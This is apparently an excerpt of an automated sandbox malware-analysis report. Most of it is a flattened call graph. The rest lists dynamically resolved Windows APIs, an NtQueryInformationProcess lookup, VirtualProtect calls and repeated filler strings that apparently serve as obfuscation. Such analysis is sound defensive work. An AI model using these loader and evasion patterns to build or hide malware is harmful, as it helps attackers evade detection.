13744->13745 13746 ec45c0 2 API calls 13745->13746 13747 ec2b7d 13746->13747 13748 ec45c0 2 API calls 13747->13748 13749 ec2b96 13748->13749 13750 ec45c0 2 API calls 13749->13750 13751 ec2baf 13750->13751 13752 ec45c0 2 API calls 13751->13752 13753 ec2bc8 13752->13753 13754 ec45c0 2 API calls 13753->13754 13755 ec2be1 13754->13755 13756 ec45c0 2 API calls 13755->13756 13757 ec2bfa 13756->13757 13758 ec45c0 2 API calls 13757->13758 13759 ec2c13 13758->13759 13760 ec45c0 2 API calls 13759->13760 13761 ec2c2c 13760->13761 13762 ec45c0 2 API calls 13761->13762 13763 ec2c45 13762->13763 13764 ec45c0 2 API calls 13763->13764 13765 ec2c5e 13764->13765 13766 ec45c0 2 API calls 13765->13766 13767 ec2c77 13766->13767 13768 ec45c0 2 API calls 13767->13768 13769 ec2c90 13768->13769 13770 ec45c0 2 
API calls 13769->13770 13771 ec2ca9 13770->13771 13772 ec45c0 2 API calls 13771->13772 13773 ec2cc2 13772->13773 13774 ec45c0 2 API calls 13773->13774 13775 ec2cdb 13774->13775 13776 ec45c0 2 API calls 13775->13776 13777 ec2cf4 13776->13777 13778 ec45c0 2 API calls 13777->13778 13779 ec2d0d 13778->13779 13780 ec45c0 2 API calls 13779->13780 13781 ec2d26 13780->13781 13782 ec45c0 2 API calls 13781->13782 13783 ec2d3f 13782->13783 13784 ec45c0 2 API calls 13783->13784 13785 ec2d58 13784->13785 13786 ec45c0 2 API calls 13785->13786 13787 ec2d71 13786->13787 13788 ec45c0 2 API calls 13787->13788 13789 ec2d8a 13788->13789 13790 ec45c0 2 API calls 13789->13790 13791 ec2da3 13790->13791 13792 ec45c0 2 API calls 13791->13792 13793 ec2dbc 13792->13793 13794 ec45c0 2 API calls 13793->13794 13795 ec2dd5 13794->13795 13796 ec45c0 2 API calls 13795->13796 13797 ec2dee 13796->13797 13798 ec45c0 2 API calls 13797->13798 13799 ec2e07 13798->13799 13800 ec45c0 2 API calls 13799->13800 13801 ec2e20 13800->13801 13802 ec45c0 2 API calls 13801->13802 13803 ec2e39 13802->13803 13804 ec45c0 2 API calls 13803->13804 13805 ec2e52 13804->13805 13806 ec45c0 2 API calls 13805->13806 13807 ec2e6b 13806->13807 13808 ec45c0 2 API calls 13807->13808 13809 ec2e84 13808->13809 13810 ec45c0 2 API calls 13809->13810 13811 ec2e9d 13810->13811 13812 ec45c0 2 API calls 13811->13812 13813 ec2eb6 13812->13813 13814 ec45c0 2 API calls 13813->13814 13815 ec2ecf 13814->13815 13816 ec45c0 2 API calls 13815->13816 13817 ec2ee8 13816->13817 13818 ec45c0 2 API calls 13817->13818 13819 ec2f01 13818->13819 13820 ec45c0 2 API calls 13819->13820 13821 ec2f1a 13820->13821 13822 ec45c0 2 API calls 13821->13822 13823 ec2f33 13822->13823 13824 ec45c0 2 API calls 13823->13824 13825 ec2f4c 13824->13825 13826 ec45c0 2 API calls 13825->13826 13827 ec2f65 13826->13827 13828 ec45c0 2 API calls 13827->13828 13829 ec2f7e 13828->13829 13830 ec45c0 2 API calls 13829->13830 13831 ec2f97 13830->13831 13832 ec45c0 2 API calls 
13831->13832 13833 ec2fb0 13832->13833 13834 ec45c0 2 API calls 13833->13834 13835 ec2fc9 13834->13835 13836 ec45c0 2 API calls 13835->13836 13837 ec2fe2 13836->13837 13838 ec45c0 2 API calls 13837->13838 13839 ec2ffb 13838->13839 13840 ec45c0 2 API calls 13839->13840 13841 ec3014 13840->13841 13842 ec45c0 2 API calls 13841->13842 13843 ec302d 13842->13843 13844 ec45c0 2 API calls 13843->13844 13845 ec3046 13844->13845 13846 ec45c0 2 API calls 13845->13846 13847 ec305f 13846->13847 13848 ec45c0 2 API calls 13847->13848 13849 ec3078 13848->13849 13850 ec45c0 2 API calls 13849->13850 13851 ec3091 13850->13851 13852 ec45c0 2 API calls 13851->13852 13853 ec30aa 13852->13853 13854 ec45c0 2 API calls 13853->13854 13855 ec30c3 13854->13855 13856 ec45c0 2 API calls 13855->13856 13857 ec30dc 13856->13857 13858 ec45c0 2 API calls 13857->13858 13859 ec30f5 13858->13859 13860 ec45c0 2 API calls 13859->13860 13861 ec310e 13860->13861 13862 ec45c0 2 API calls 13861->13862 13863 ec3127 13862->13863 13864 ec45c0 2 API calls 13863->13864 13865 ec3140 13864->13865 13866 ec45c0 2 API calls 13865->13866 13867 ec3159 13866->13867 13868 ec45c0 2 API calls 13867->13868 13869 ec3172 13868->13869 13870 ec45c0 2 API calls 13869->13870 13871 ec318b 13870->13871 13872 ec45c0 2 API calls 13871->13872 13873 ec31a4 13872->13873 13874 ec45c0 2 API calls 13873->13874 13875 ec31bd 13874->13875 13876 ec45c0 2 API calls 13875->13876 13877 ec31d6 13876->13877 13878 ec45c0 2 API calls 13877->13878 13879 ec31ef 13878->13879 13880 ec45c0 2 API calls 13879->13880 13881 ec3208 13880->13881 13882 ec45c0 2 API calls 13881->13882 13883 ec3221 13882->13883 13884 ec45c0 2 API calls 13883->13884 13885 ec323a 13884->13885 13886 ec45c0 2 API calls 13885->13886 13887 ec3253 13886->13887 13888 ec45c0 2 API calls 13887->13888 13889 ec326c 13888->13889 13890 ec45c0 2 API calls 13889->13890 13891 ec3285 13890->13891 13892 ec45c0 2 API calls 13891->13892 13893 ec329e 13892->13893 13894 ec45c0 2 API calls 13893->13894 
13895 ec32b7 13894->13895 13896 ec45c0 2 API calls 13895->13896 13897 ec32d0 13896->13897 13898 ec45c0 2 API calls 13897->13898 13899 ec32e9 13898->13899 13900 ec45c0 2 API calls 13899->13900 13901 ec3302 13900->13901 13902 ec45c0 2 API calls 13901->13902 13903 ec331b 13902->13903 13904 ec45c0 2 API calls 13903->13904 13905 ec3334 13904->13905 13906 ec45c0 2 API calls 13905->13906 13907 ec334d 13906->13907 13908 ec45c0 2 API calls 13907->13908 13909 ec3366 13908->13909 13910 ec45c0 2 API calls 13909->13910 13911 ec337f 13910->13911 13912 ec45c0 2 API calls 13911->13912 13913 ec3398 13912->13913 13914 ec45c0 2 API calls 13913->13914 13915 ec33b1 13914->13915 13916 ec45c0 2 API calls 13915->13916 13917 ec33ca 13916->13917 13918 ec45c0 2 API calls 13917->13918 13919 ec33e3 13918->13919 13920 ec45c0 2 API calls 13919->13920 13921 ec33fc 13920->13921 13922 ec45c0 2 API calls 13921->13922 13923 ec3415 13922->13923 13924 ec45c0 2 API calls 13923->13924 13925 ec342e 13924->13925 13926 ec45c0 2 API calls 13925->13926 13927 ec3447 13926->13927 13928 ec45c0 2 API calls 13927->13928 13929 ec3460 13928->13929 13930 ec45c0 2 API calls 13929->13930 13931 ec3479 13930->13931 13932 ec45c0 2 API calls 13931->13932 13933 ec3492 13932->13933 13934 ec45c0 2 API calls 13933->13934 13935 ec34ab 13934->13935 13936 ec45c0 2 API calls 13935->13936 13937 ec34c4 13936->13937 13938 ec45c0 2 API calls 13937->13938 13939 ec34dd 13938->13939 13940 ec45c0 2 API calls 13939->13940 13941 ec34f6 13940->13941 13942 ec45c0 2 API calls 13941->13942 13943 ec350f 13942->13943 13944 ec45c0 2 API calls 13943->13944 13945 ec3528 13944->13945 13946 ec45c0 2 API calls 13945->13946 13947 ec3541 13946->13947 13948 ec45c0 2 API calls 13947->13948 13949 ec355a 13948->13949 13950 ec45c0 2 API calls 13949->13950 13951 ec3573 13950->13951 13952 ec45c0 2 API calls 13951->13952 13953 ec358c 13952->13953 13954 ec45c0 2 API calls 13953->13954 13955 ec35a5 13954->13955 13956 ec45c0 2 API calls 13955->13956 13957 ec35be 
13956->13957 13958 ec45c0 2 API calls 13957->13958 13959 ec35d7 13958->13959 13960 ec45c0 2 API calls 13959->13960 13961 ec35f0 13960->13961 13962 ec45c0 2 API calls 13961->13962 13963 ec3609 13962->13963 13964 ec45c0 2 API calls 13963->13964 13965 ec3622 13964->13965 13966 ec45c0 2 API calls 13965->13966 13967 ec363b 13966->13967 13968 ec45c0 2 API calls 13967->13968 13969 ec3654 13968->13969 13970 ec45c0 2 API calls 13969->13970 13971 ec366d 13970->13971 13972 ec45c0 2 API calls 13971->13972 13973 ec3686 13972->13973 13974 ec45c0 2 API calls 13973->13974 13975 ec369f 13974->13975 13976 ec45c0 2 API calls 13975->13976 13977 ec36b8 13976->13977 13978 ec45c0 2 API calls 13977->13978 13979 ec36d1 13978->13979 13980 ec45c0 2 API calls 13979->13980 13981 ec36ea 13980->13981 13982 ec45c0 2 API calls 13981->13982 13983 ec3703 13982->13983 13984 ec45c0 2 API calls 13983->13984 13985 ec371c 13984->13985 13986 ec45c0 2 API calls 13985->13986 13987 ec3735 13986->13987 13988 ec45c0 2 API calls 13987->13988 13989 ec374e 13988->13989 13990 ec45c0 2 API calls 13989->13990 13991 ec3767 13990->13991 13992 ec45c0 2 API calls 13991->13992 13993 ec3780 13992->13993 13994 ec45c0 2 API calls 13993->13994 13995 ec3799 13994->13995 13996 ec45c0 2 API calls 13995->13996 13997 ec37b2 13996->13997 13998 ec45c0 2 API calls 13997->13998 13999 ec37cb 13998->13999 14000 ec45c0 2 API calls 13999->14000 14001 ec37e4 14000->14001 14002 ec45c0 2 API calls 14001->14002 14003 ec37fd 14002->14003 14004 ec45c0 2 API calls 14003->14004 14005 ec3816 14004->14005 14006 ec45c0 2 API calls 14005->14006 14007 ec382f 14006->14007 14008 ec45c0 2 API calls 14007->14008 14009 ec3848 14008->14009 14010 ec45c0 2 API calls 14009->14010 14011 ec3861 14010->14011 14012 ec45c0 2 API calls 14011->14012 14013 ec387a 14012->14013 14014 ec45c0 2 API calls 14013->14014 14015 ec3893 14014->14015 14016 ec45c0 2 API calls 14015->14016 14017 ec38ac 14016->14017 14018 ec45c0 2 API calls 14017->14018 14019 ec38c5 14018->14019 
14020 ec45c0 2 API calls 14019->14020 14021 ec38de 14020->14021 14022 ec45c0 2 API calls 14021->14022 14023 ec38f7 14022->14023 14024 ec45c0 2 API calls 14023->14024 14025 ec3910 14024->14025 14026 ec45c0 2 API calls 14025->14026 14027 ec3929 14026->14027 14028 ec45c0 2 API calls 14027->14028 14029 ec3942 14028->14029 14030 ec45c0 2 API calls 14029->14030 14031 ec395b 14030->14031 14032 ec45c0 2 API calls 14031->14032 14033 ec3974 14032->14033 14034 ec45c0 2 API calls 14033->14034 14035 ec398d 14034->14035 14036 ec45c0 2 API calls 14035->14036 14037 ec39a6 14036->14037 14038 ec45c0 2 API calls 14037->14038 14039 ec39bf 14038->14039 14040 ec45c0 2 API calls 14039->14040 14041 ec39d8 14040->14041 14042 ec45c0 2 API calls 14041->14042 14043 ec39f1 14042->14043 14044 ec45c0 2 API calls 14043->14044 14045 ec3a0a 14044->14045 14046 ec45c0 2 API calls 14045->14046 14047 ec3a23 14046->14047 14048 ec45c0 2 API calls 14047->14048 14049 ec3a3c 14048->14049 14050 ec45c0 2 API calls 14049->14050 14051 ec3a55 14050->14051 14052 ec45c0 2 API calls 14051->14052 14053 ec3a6e 14052->14053 14054 ec45c0 2 API calls 14053->14054 14055 ec3a87 14054->14055 14056 ec45c0 2 API calls 14055->14056 14057 ec3aa0 14056->14057 14058 ec45c0 2 API calls 14057->14058 14059 ec3ab9 14058->14059 14060 ec45c0 2 API calls 14059->14060 14061 ec3ad2 14060->14061 14062 ec45c0 2 API calls 14061->14062 14063 ec3aeb 14062->14063 14064 ec45c0 2 API calls 14063->14064 14065 ec3b04 14064->14065 14066 ec45c0 2 API calls 14065->14066 14067 ec3b1d 14066->14067 14068 ec45c0 2 API calls 14067->14068 14069 ec3b36 14068->14069 14070 ec45c0 2 API calls 14069->14070 14071 ec3b4f 14070->14071 14072 ec45c0 2 API calls 14071->14072 14073 ec3b68 14072->14073 14074 ec45c0 2 API calls 14073->14074 14075 ec3b81 14074->14075 14076 ec45c0 2 API calls 14075->14076 14077 ec3b9a 14076->14077 14078 ec45c0 2 API calls 14077->14078 14079 ec3bb3 14078->14079 14080 ec45c0 2 API calls 14079->14080 14081 ec3bcc 14080->14081 14082 ec45c0 2 
API calls 14081->14082 14083 ec3be5 14082->14083 14084 ec45c0 2 API calls 14083->14084 14085 ec3bfe 14084->14085 14086 ec45c0 2 API calls 14085->14086 14087 ec3c17 14086->14087 14088 ec45c0 2 API calls 14087->14088 14089 ec3c30 14088->14089 14090 ec45c0 2 API calls 14089->14090 14091 ec3c49 14090->14091 14092 ec45c0 2 API calls 14091->14092 14093 ec3c62 14092->14093 14094 ec45c0 2 API calls 14093->14094 14095 ec3c7b 14094->14095 14096 ec45c0 2 API calls 14095->14096 14097 ec3c94 14096->14097 14098 ec45c0 2 API calls 14097->14098 14099 ec3cad 14098->14099 14100 ec45c0 2 API calls 14099->14100 14101 ec3cc6 14100->14101 14102 ec45c0 2 API calls 14101->14102 14103 ec3cdf 14102->14103 14104 ec45c0 2 API calls 14103->14104 14105 ec3cf8 14104->14105 14106 ec45c0 2 API calls 14105->14106 14107 ec3d11 14106->14107 14108 ec45c0 2 API calls 14107->14108 14109 ec3d2a 14108->14109 14110 ec45c0 2 API calls 14109->14110 14111 ec3d43 14110->14111 14112 ec45c0 2 API calls 14111->14112 14113 ec3d5c 14112->14113 14114 ec45c0 2 API calls 14113->14114 14115 ec3d75 14114->14115 14116 ec45c0 2 API calls 14115->14116 14117 ec3d8e 14116->14117 14118 ec45c0 2 API calls 14117->14118 14119 ec3da7 14118->14119 14120 ec45c0 2 API calls 14119->14120 14121 ec3dc0 14120->14121 14122 ec45c0 2 API calls 14121->14122 14123 ec3dd9 14122->14123 14124 ec45c0 2 API calls 14123->14124 14125 ec3df2 14124->14125 14126 ec45c0 2 API calls 14125->14126 14127 ec3e0b 14126->14127 14128 ec45c0 2 API calls 14127->14128 14129 ec3e24 14128->14129 14130 ec45c0 2 API calls 14129->14130 14131 ec3e3d 14130->14131 14132 ec45c0 2 API calls 14131->14132 14133 ec3e56 14132->14133 14134 ec45c0 2 API calls 14133->14134 14135 ec3e6f 14134->14135 14136 ec45c0 2 API calls 14135->14136 14137 ec3e88 14136->14137 14138 ec45c0 2 API calls 14137->14138 14139 ec3ea1 14138->14139 14140 ec45c0 2 API calls 14139->14140 14141 ec3eba 14140->14141 14142 ec45c0 2 API calls 14141->14142 14143 ec3ed3 14142->14143 14144 ec45c0 2 API calls 
14143->14144 14145 ec3eec 14144->14145 14146 ec45c0 2 API calls 14145->14146 14147 ec3f05 14146->14147 14148 ec45c0 2 API calls 14147->14148 14149 ec3f1e 14148->14149 14150 ec45c0 2 API calls 14149->14150 14151 ec3f37 14150->14151 14152 ec45c0 2 API calls 14151->14152 14153 ec3f50 14152->14153 14154 ec45c0 2 API calls 14153->14154 14155 ec3f69 14154->14155 14156 ec45c0 2 API calls 14155->14156 14157 ec3f82 14156->14157 14158 ec45c0 2 API calls 14157->14158 14159 ec3f9b 14158->14159 14160 ec45c0 2 API calls 14159->14160 14161 ec3fb4 14160->14161 14162 ec45c0 2 API calls 14161->14162 14163 ec3fcd 14162->14163 14164 ec45c0 2 API calls 14163->14164 14165 ec3fe6 14164->14165 14166 ec45c0 2 API calls 14165->14166 14167 ec3fff 14166->14167 14168 ec45c0 2 API calls 14167->14168 14169 ec4018 14168->14169 14170 ec45c0 2 API calls 14169->14170 14171 ec4031 14170->14171 14172 ec45c0 2 API calls 14171->14172 14173 ec404a 14172->14173 14174 ec45c0 2 API calls 14173->14174 14175 ec4063 14174->14175 14176 ec45c0 2 API calls 14175->14176 14177 ec407c 14176->14177 14178 ec45c0 2 API calls 14177->14178 14179 ec4095 14178->14179 14180 ec45c0 2 API calls 14179->14180 14181 ec40ae 14180->14181 14182 ec45c0 2 API calls 14181->14182 14183 ec40c7 14182->14183 14184 ec45c0 2 API calls 14183->14184 14185 ec40e0 14184->14185 14186 ec45c0 2 API calls 14185->14186 14187 ec40f9 14186->14187 14188 ec45c0 2 API calls 14187->14188 14189 ec4112 14188->14189 14190 ec45c0 2 API calls 14189->14190 14191 ec412b 14190->14191 14192 ec45c0 2 API calls 14191->14192 14193 ec4144 14192->14193 14194 ec45c0 2 API calls 14193->14194 14195 ec415d 14194->14195 14196 ec45c0 2 API calls 14195->14196 14197 ec4176 14196->14197 14198 ec45c0 2 API calls 14197->14198 14199 ec418f 14198->14199 14200 ec45c0 2 API calls 14199->14200 14201 ec41a8 14200->14201 14202 ec45c0 2 API calls 14201->14202 14203 ec41c1 14202->14203 14204 ec45c0 2 API calls 14203->14204 14205 ec41da 14204->14205 14206 ec45c0 2 API calls 14205->14206 
14207 ec41f3 14206->14207 14208 ec45c0 2 API calls 14207->14208 14209 ec420c 14208->14209 14210 ec45c0 2 API calls 14209->14210 14211 ec4225 14210->14211 14212 ec45c0 2 API calls 14211->14212 14213 ec423e 14212->14213 14214 ec45c0 2 API calls 14213->14214 14215 ec4257 14214->14215 14216 ec45c0 2 API calls 14215->14216 14217 ec4270 14216->14217 14218 ec45c0 2 API calls 14217->14218 14219 ec4289 14218->14219 14220 ec45c0 2 API calls 14219->14220 14221 ec42a2 14220->14221 14222 ec45c0 2 API calls 14221->14222 14223 ec42bb 14222->14223 14224 ec45c0 2 API calls 14223->14224 14225 ec42d4 14224->14225 14226 ec45c0 2 API calls 14225->14226 14227 ec42ed 14226->14227 14228 ec45c0 2 API calls 14227->14228 14229 ec4306 14228->14229 14230 ec45c0 2 API calls 14229->14230 14231 ec431f 14230->14231 14232 ec45c0 2 API calls 14231->14232 14233 ec4338 14232->14233 14234 ec45c0 2 API calls 14233->14234 14235 ec4351 14234->14235 14236 ec45c0 2 API calls 14235->14236 14237 ec436a 14236->14237 14238 ec45c0 2 API calls 14237->14238 14239 ec4383 14238->14239 14240 ec45c0 2 API calls 14239->14240 14241 ec439c 14240->14241 14242 ec45c0 2 API calls 14241->14242 14243 ec43b5 14242->14243 14244 ec45c0 2 API calls 14243->14244 14245 ec43ce 14244->14245 14246 ec45c0 2 API calls 14245->14246 14247 ec43e7 14246->14247 14248 ec45c0 2 API calls 14247->14248 14249 ec4400 14248->14249 14250 ec45c0 2 API calls 14249->14250 14251 ec4419 14250->14251 14252 ec45c0 2 API calls 14251->14252 14253 ec4432 14252->14253 14254 ec45c0 2 API calls 14253->14254 14255 ec444b 14254->14255 14256 ec45c0 2 API calls 14255->14256 14257 ec4464 14256->14257 14258 ec45c0 2 API calls 14257->14258 14259 ec447d 14258->14259 14260 ec45c0 2 API calls 14259->14260 14261 ec4496 14260->14261 14262 ec45c0 2 API calls 14261->14262 14263 ec44af 14262->14263 14264 ec45c0 2 API calls 14263->14264 14265 ec44c8 14264->14265 14266 ec45c0 2 API calls 14265->14266 14267 ec44e1 14266->14267 14268 ec45c0 2 API calls 14267->14268 14269 ec44fa 
14268->14269 14270 ec45c0 2 API calls 14269->14270 14271 ec4513 14270->14271 14272 ec45c0 2 API calls 14271->14272 14273 ec452c 14272->14273 14274 ec45c0 2 API calls 14273->14274 14275 ec4545 14274->14275 14276 ec45c0 2 API calls 14275->14276 14277 ec455e 14276->14277 14278 ec45c0 2 API calls 14277->14278 14279 ec4577 14278->14279 14280 ec45c0 2 API calls 14279->14280 14281 ec4590 14280->14281 14282 ec45c0 2 API calls 14281->14282 14283 ec45a9 14282->14283 14284 ed9c10 14283->14284 14285 eda036 8 API calls 14284->14285 14286 ed9c20 43 API calls 14284->14286 14287 eda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14285->14287 14288 eda146 14285->14288 14286->14285 14287->14288 14289 eda216 14288->14289 14290 eda153 8 API calls 14288->14290 14291 eda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14289->14291 14292 eda298 14289->14292 14290->14289 14291->14292 14293 eda2a5 6 API calls 14292->14293 14294 eda337 14292->14294 14293->14294 14295 eda41f 14294->14295 14296 eda344 9 API calls 14294->14296 14297 eda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14295->14297 14298 eda4a2 14295->14298 14296->14295 14297->14298 14299 eda4dc 14298->14299 14300 eda4ab GetProcAddress GetProcAddress 14298->14300 14301 eda515 14299->14301 14302 eda4e5 GetProcAddress GetProcAddress 14299->14302 14300->14299 14303 eda612 14301->14303 14304 eda522 10 API calls 14301->14304 14302->14301 14305 eda67d 14303->14305 14306 eda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14303->14306 14304->14303 14307 eda69e 14305->14307 14308 eda686 GetProcAddress 14305->14308 14306->14305 14309 ed5ca3 14307->14309 14310 eda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14307->14310 14308->14307 14311 ec1590 14309->14311 14310->14309 15432 ec1670 14311->15432 14314 eda7a0 lstrcpy 14315 ec15b5 14314->14315 14316 eda7a0 lstrcpy 14315->14316 14317 ec15c7 14316->14317 14318 eda7a0 

Control-flow Graph
APIs
• GetProcAddress.KERNEL32(74DD0000,00DA2338), ref: 00ED98A1
• GetProcAddress.KERNEL32(74DD0000,00DA21B8), ref: 00ED98BA
• GetProcAddress.KERNEL32(74DD0000,00DA2380), ref: 00ED98D2
• GetProcAddress.KERNEL32(74DD0000,00DA2230), ref: 00ED98EA
• GetProcAddress.KERNEL32(74DD0000,00DA21D0), ref: 00ED9903
• GetProcAddress.KERNEL32(74DD0000,00DA8E48), ref: 00ED991B
• GetProcAddress.KERNEL32(74DD0000,00D95210), ref: 00ED9933
• GetProcAddress.KERNEL32(74DD0000,00D953D0), ref: 00ED994C
• GetProcAddress.KERNEL32(74DD0000,00DA22F0), ref: 00ED9964
• GetProcAddress.KERNEL32(74DD0000,00DA2398), ref: 00ED997C
• GetProcAddress.KERNEL32(74DD0000,00DA2248), ref: 00ED9995
• GetProcAddress.KERNEL32(74DD0000,00DA2350), ref: 00ED99AD
• GetProcAddress.KERNEL32(74DD0000,00D95410), ref: 00ED99C5
• GetProcAddress.KERNEL32(74DD0000,00DA2368), ref: 00ED99DE
• GetProcAddress.KERNEL32(74DD0000,00DA20F8), ref: 00ED99F6
• GetProcAddress.KERNEL32(74DD0000,00D95490), ref: 00ED9A0E
• GetProcAddress.KERNEL32(74DD0000,00DA2110), ref: 00ED9A27
• GetProcAddress.KERNEL32(74DD0000,00DA2140), ref: 00ED9A3F
• GetProcAddress.KERNEL32(74DD0000,00D952D0), ref: 00ED9A57
• GetProcAddress.KERNEL32(74DD0000,00DA2158), ref: 00ED9A70
• GetProcAddress.KERNEL32(74DD0000,00D954D0), ref: 00ED9A88
• LoadLibraryA.KERNEL32(00DA2488,?,00ED6A00), ref: 00ED9A9A
• LoadLibraryA.KERNEL32(00DA2410,?,00ED6A00), ref: 00ED9AAB
• LoadLibraryA.KERNEL32(00DA2458,?,00ED6A00), ref: 00ED9ABD
• LoadLibraryA.KERNEL32(00DA2428,?,00ED6A00), ref: 00ED9ACF
• LoadLibraryA.KERNEL32(00DA2470,?,00ED6A00), ref: 00ED9AE0
• GetProcAddress.KERNEL32(75A70000,00DA24A0), ref: 00ED9B02
• GetProcAddress.KERNEL32(75290000,00DA2440), ref: 00ED9B23
• GetProcAddress.KERNEL32(75290000,00DA24B8), ref: 00ED9B3B
• GetProcAddress.KERNEL32(75BD0000,00DA23F8), ref: 00ED9B5D
• GetProcAddress.KERNEL32(75450000,00D95390), ref: 00ED9B7E
• GetProcAddress.KERNEL32(76E90000,00DA8EE8), ref: 00ED9B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00ED9BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00ED9BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction ID: 368aaca265a629e11adce1e31b7d42841a0857fdb81c88242388e58c555208db
                                • Opcode Fuzzy Hash: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction Fuzzy Hash: CAA11BB5D107409FD36EEFA8F99895637F9FF8C302704853AA6268324CD6BA95C1CB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 ec45c0-ec4695 RtlAllocateHeap 781 ec46a0-ec46a6 764->781 782 ec46ac-ec474a 781->782 783 ec474f-ec47a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EC479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45D2
